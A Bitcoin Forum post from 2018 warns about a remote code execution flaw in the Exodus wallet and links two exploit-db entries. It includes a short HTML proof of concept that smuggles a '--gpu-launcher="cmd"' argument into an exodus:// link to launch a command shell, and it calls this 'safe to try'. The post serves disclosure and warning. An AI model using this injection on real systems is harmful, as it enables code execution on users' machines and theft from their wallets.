Bitcoin Forum
June 23, 2024, 08:02:21 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Bitcoin Forum > Other > Off-topic > Warning! Exodus RCE (Remote Code Execution) [Safe links]
Pages: [1]
« previous topic next topic »
  Print  
Author Topic: Warning! Exodus RCE (Remote Code Execution) [Safe links]  (Read 86 times)
chrusso (OP)
Member
**
Offline Offline

Activity: 134
Merit: 10


View Profile
April 26, 2018, 09:01:27 PM
Merited by TrumpD (2)
 #1
I don't know if this has been mentioned before in the forums, but take when browsing the web with your Exodus Wallet open. The last version seems to be patched, hence it doesn't seem to be vulnerable.

Here's a safe to try proof of concept of the security flaw:

<!doctype html>
<script>
  window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='
</script>

You can save that as HTML if you desire and see how Exodus process the request. Here's also 2 links to exploit-db for more information about the RCE:

- https://www.exploit-db.com/exploits/44357/
- https://www.exploit-db.com/exploits/43899/

Merit is welcome. Safe browsing!
Chris,
Pages: [1]
  Print  
Bitcoin Forum > Other > Off-topic > Warning! Exodus RCE (Remote Code Execution) [Safe links]
 « previous topic next topic »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!